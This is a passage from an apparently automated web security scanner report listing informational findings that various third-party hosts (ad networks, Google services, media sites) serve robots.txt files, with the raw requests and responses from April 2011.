The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Content-Length: 23
Last-Modified: Thu, 21 Oct 2010 04:40:53 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:44381
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

User-agent: *
Allow: /
30.26. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwiAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.27. http://goods43.adnectar.com/analytics/record_impression  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods43.adnectar.com
Path:   /analytics/record_impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:30 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcJNKXjmCL4vAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 12:06:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
30.29. http://i2.duck.co/i/xss.cx.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.duck.co
Path:   /i/xss.cx.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i2.duck.co

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:19 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Sat, 06 Nov 2010 18:56:19 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
30.30. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ideco-software.ru

Response

HTTP/1.1 200 OK
Content-Length: 58
Content-Type: text/plain
Last-Modified: Tue, 11 Nov 2008 09:18:17 GMT
Accept-Ranges: bytes
ETag: "74a2ab6ede43c91:fcf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:36:04 GMT
Connection: close

User-agent: *
Disallow:


Host: www.ideco-software.ru
30.31. http://imagesrv.gartner.com/cio/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /cio/css/main.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/plain
Last-modified: Tue, 17 Nov 2009 16:20:54 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 28
ETag: "pvacd973686270d8ac5ed7002c7dba1bf2"
Expires: Wed, 27 Apr 2011 12:11:16 GMT
Age: 1
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10232.C10821.A150986.RA0.G24F27.U2A1BF8DA].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=15658f72d9195ca7a9904bc69fbdb85aec79908c2a0961ae4db564e4; Path=/

User-agent: *
Disallow: /
30.32. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.en25.com
Path:   /Web/KronosIncorporated/kronos-ga.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 44
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

# do not index
User-agent: *
Disallow: /
30.33. http://ioerror.us/bb2-support-key  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /bb2-support-key

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ioerror.us

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 16:05:45 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1303747545+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://ioerror.us/xmlrpc.php

User-agent: *
Disallow:
30.34. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

# go away
User-agent: *
Disallow: /
30.35. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:13:59 GMT
Expires: Mon, 25 Apr 2011 12:13:59 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.36. http://mbox5.offermatica.com/m2/netsuite/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"25-1284655556000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Thu, 16 Sep 2010 16:45:56 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /
30.37. http://netsuite-www.baynote.net/baynote/customerstatus2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/customerstatus2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1303743002000"
Last-Modified: Mon, 25 Apr 2011 14:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 25 Apr 2011 15:14:05 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...
30.38. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"52-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 52
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

User-agent: *
Disallow: /profile/
Disallow: /group/
30.39. http://partner-support.wiki.zoho.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partner-support.wiki.zoho.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partner-support.wiki.zoho.com

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=26f97a57-e7a8-42c8-831f-0a1507f276d0; Path=/
Set-Cookie: JSESSIONID=937B73A17A5A2C608D08D102160832D6; Path=/
Expires: Tue, 24 Apr 2012 12:15:19 GMT
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Mon, 25 Apr 2011 05:15:19 PDT
Content-Type: text/plain;charset=UTF-8
Content-Length: 154
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Connection: close

# Settings file for search engine crawlers
# Example:
# User-agent: *
# Disallow: /*
# Allow: /sitemap.zhtml
User-agent: *
Disallow: /*
30.40. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...
30.41. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

User-agent: *
Disallow: /
30.42. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: playaudiomessage.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Date: Mon, 25 Apr 2011 19:53:57 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 18 Jan 2010 17:52:00 GMT
ETag: "0e028ef6698ca1:db8"
Content-Length: 178

User-agent: *
Disallow: /xiosofthidden/
Disallow: /instantaudio/
Disallow: /instantaudiodev/
Disallow: /Xiosoft/members/
Disallow: /Xiosoft/membersdev/
Disallow: /secure/
30.43. http://player.vimeo.com/video/22043447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/22043447

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: player.vimeo.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 23:28:49 GMT
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=315360000
Expires: Thu, 22 Apr 2021 16:03:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
30.44. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:35 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 91
Last-Modified: Fri, 25 Jul 2008 12:11:17 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /a-search

User-agent: Yandex
Disallow: /a-search
Crawl-delay: 100
30.45. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:55 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
30.46. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
30.47. http://rs.mail.ru/d292152.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.mail.ru
Path:   /d292152.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
30.48. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 14:10:10 GMT
Expires: Tue, 26 Apr 2011 14:10:10 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 2397

User-agent: *
Disallow: /
30.49. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:27 GMT
Expires: Mon, 25 Apr 2011 12:01:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.50. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:26 GMT
Expires: Mon, 25 Apr 2011 12:01:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.51. http://search.twitter.com/search.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:07 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 14:40:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?
30.52. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 15:14:05 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
30.53. http://solutions.kronos.com/content/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /content/experience2011

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: solutions.kronos.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:38 GMT
Connection: keep-alive
Content-Length: 41

# do not index
User-agent: *
Allow: /
30.54. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tengrinews.kz

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Thu, 13 Jan 2011 05:43:07 GMT
ETag: "9a69b-ae-499b3cac5d0c0"
Accept-Ranges: bytes
Content-Length: 174
Vary: Accept-Encoding

User-agent: *

Disallow: /unsorted/
Disallow: /search/
Disallow: /admin/
Disallow: /index.php

Host: tengrinews.kz

Sitemap: http://tengrinews.kz/sitemap-index.xml
30.55. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 16:03:34 GMT
Expires: Mon, 25 Apr 2011 16:03:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /
30.56. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:30 GMT
Expires: Mon, 25 Apr 2011 12:01:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.57. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 05:20:00 GMT
ETag: "1da0b2-103-49fc071e1c000"
Accept-Ranges: bytes
Content-Length: 259
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# AdventNet Inc. -- http://traffic.adventnet.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 11-04-2005
# ------------------
...[SNIP]...
30.58. http://track.pulse360.com/cgi-bin/tracker.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.pulse360.com
Path:   /cgi-bin/tracker.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.pulse360.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:06:11 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 15:13:11 GMT
ETag: "99265-1a-1018cfc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /
30.59. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:48:26 GMT
Expires: Mon, 25 Apr 2011 14:48:26 GMT
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: PREF=ID=aee9452c79d75218:TM=1303742906:LM=1303742906:S=BNtTP0A1GiFU3yk-; expires=Wed, 24-Apr-2013 14:48:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...
30.60. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 25 Apr 2011 14:48:56 GMT
Expires: Mon, 25 Apr 2011 14:48:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.61. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:07:31 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=408 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Tue, 26 Apr 2011 12:07:30 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /
30.62. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wtssdc.gartner.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
# $DateTime: 2006/02/08 13:22:46 $
#
######################
...[SNIP]...
30.63. http://www.customermagnetism.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.customermagnetism.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:28 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 21:32:07 GMT
ETag: "183c4a2-295-494b996d143c0"
Accept-Ranges: bytes
Content-Length: 661
Cache-Control: max-age=7200, private, must-revalidate
Expires: Mon, 25 Apr 2011 18:03:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://www.customermagnetism.com/sitemap.xml
Sitemap: http://www.mobile.customermagnetism.com/mobilesitemap.xml

User-agent: *
Allow: /
Disallow: /email-files/
Disallow: /lmx/
Disallow: /LMX-
...[SNIP]...
30.64. http://www.dmca.com/Protection/Status.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmca.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 11 Mar 2011 04:01:58 GMT
Accept-Ranges: bytes
ETag: "94183e11a1dfcb1:0"
